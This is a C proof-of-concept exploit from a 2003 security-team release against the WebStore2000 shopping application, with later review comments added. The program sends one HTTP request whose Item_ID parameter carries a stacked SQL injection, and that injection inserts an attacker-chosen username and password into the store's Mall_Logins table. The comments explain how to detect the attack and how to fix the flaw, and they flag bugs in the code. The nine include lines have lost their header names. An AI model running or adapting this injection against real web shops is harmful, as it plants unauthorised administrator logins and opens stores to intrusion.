$Id: bosen-exp.5,v1 02/06/2003 bosen Exp $ 1ndonesian Security Team (1st) Bosen Exploit #5 WebStore2000 SQL Injection 02/06/2003 [1st] WebStore2000 SQL Injection Exploits (in c) by negative _______________________________________________________________________________
/*$Id: ws2k-ex.c,v 1.5 2003/06/02 14:18:01 jim Exp $*/
/* ws2k-ex.c -- WebStore2000 SQL Injection Proof of Concept
 *
 * Original exploit (ws2k-ex.pl) by Bosen
 * Please see http://www.bosen.net/releases/?id=30 for details.
 *
 * Build tested successfully on
 *	- Darwin-6.6 (PPC)		- OpenBSD-3.3 (x86)
 *	- Linux-2.4.18 (x86)		- FreeBSD 4.8-STABLE (x86)
 *
 *	- ngtv@mgnsm.nt/0603
 *
 * Review notes (defensive reading of this listing):
 *  - The whole program is one HTTP/1.0 GET to /browse_item_details.asp whose
 *    Item_ID value closes the quoted literal and appends a second statement
 *    (an INSERT into Mall_Logins).  Any request in which Item_ID carries a
 *    quote character and a statement separator is therefore a high-confidence
 *    detection; Item_ID is evidently meant to be an identifier, so input
 *    validation to a numeric value plus a parameterised query is the
 *    application-side fix.
 *  - The hard-coded Referer and User-Agent values in the request below are a
 *    stable fingerprint of this specific tool in web-server logs.
 *  - No response is read; the tool cannot tell success from failure.
 *  - The header names of the nine #include directives were lost when this
 *    listing was extracted; the stock names are not reconstructed here.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include

void	usage(void);

/*
 * Parse -t/-u/-p, resolve the target, and send a single crafted GET
 * request over a plain TCP connection to port 80.  Exits via usage() on
 * bad arguments or a failed name lookup; exits non-zero on socket errors.
 */
int
main(int argc, char *argv[])
{
	int		ch, sock;
	struct hostent	*he;
	struct sockaddr_in sin;
	char		buffer[1024];
	/*
	 * NOTE(review): target is never initialised.  It is only assigned in
	 * the 't' case below, so running without -t passes an indeterminate
	 * pointer to gethostbyname() -- undefined behaviour, typically a
	 * crash rather than the usage() message the author intended.
	 */
	char		*target, *username, *password;

	/* Defaults used when -u / -p are not given. */
	username = "bosen";
	password = "gembel";

	/*
	 * Leading ':' in the optstring makes a missing option argument come
	 * back as ':', which falls through to default and calls usage().
	 */
	while ((ch = getopt(argc, argv, ":t:u:p:")) != -1)
		switch (ch) {
		case 't':
			target = optarg;
			break;
		case 'u':
			username = optarg;
			break;
		case 'p':
			password = optarg;
			break;
		case 'h':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	/*
	 * NOTE(review): optind never exceeds the original argc, so this
	 * condition cannot be true; it does not catch a missing -t.
	 */
	if (argc < 0)
		usage();

	/* A lookup failure is reported as a usage error, not as a resolver error. */
	if ((he = gethostbyname(target)) == NULL)
		usage();

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		exit(-1);	/* exit(-1) is reported to the shell as status 255 */
	}

	printf("ws2k-ex -- WebStore2000 SQL Injection Proof of Concept\n");
	/* The password is echoed to stdout in clear text. */
	printf("Target: %s, Username: %s, Password: %s.\n",
	    target, username, password);

	/* Port 80 is hard-coded; only the first resolved address is used. */
	sin.sin_family = AF_INET;
	sin.sin_port = htons(80);
	sin.sin_addr = *((struct in_addr *) he->h_addr);
	bzero(&(sin.sin_zero), 8);

	if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) {
		perror("connect");
		exit(1);
	}

	/*
	 * Build the request.  snprintf() bounds the write to the 1024-byte
	 * buffer and NUL-terminates; the request itself is the detection
	 * signature described in the file header.
	 */
	snprintf(buffer, sizeof(buffer),
	    "GET /browse_item_details.asp?Item_ID=''; insert into Mall_Logins values ('%s','%s')-- HTTP/1.0\r\nReferer: http://www.bosen.net/releases/?id=30\r\nUser-Agent: Gembel/Sakti!\r\n\r\n",
	    username, password);

	/*
	 * NOTE(review): this sends all 1024 bytes of buffer, not the length
	 * of the formatted request.  buffer was never initialised, so the
	 * bytes after the terminating NUL are whatever was on the stack --
	 * trailing garbage on the wire and a leak of local stack contents to
	 * the remote host.  strlen(buffer) would be the intended length.
	 * Only a negative return is treated as an error; a short write is
	 * not detected.
	 */
	if ((write(sock, buffer, sizeof(buffer))) < 0) {
		perror("write");
		exit(-1);
	}

	/* Scrub the request from the stack buffer and close the connection. */
	bzero(&buffer, sizeof(buffer));
	close(sock);

	exit(0);
}

/*
 * Print the command-line synopsis to stderr and exit with status 1.
 * __progname is the BSD libc program-name extern (glibc exports it too),
 * which matches the platforms listed in the file header.
 */
void
usage(void)
{
	extern char *__progname;

	(void) fprintf(stderr, "usage: %s [-t target] [-u user]", __progname);
	(void) fprintf(stderr, " [-p password]\n");
	exit(1);
}
Bosen ====================== Original document can be fount at http://bosen.net/releases/?id=32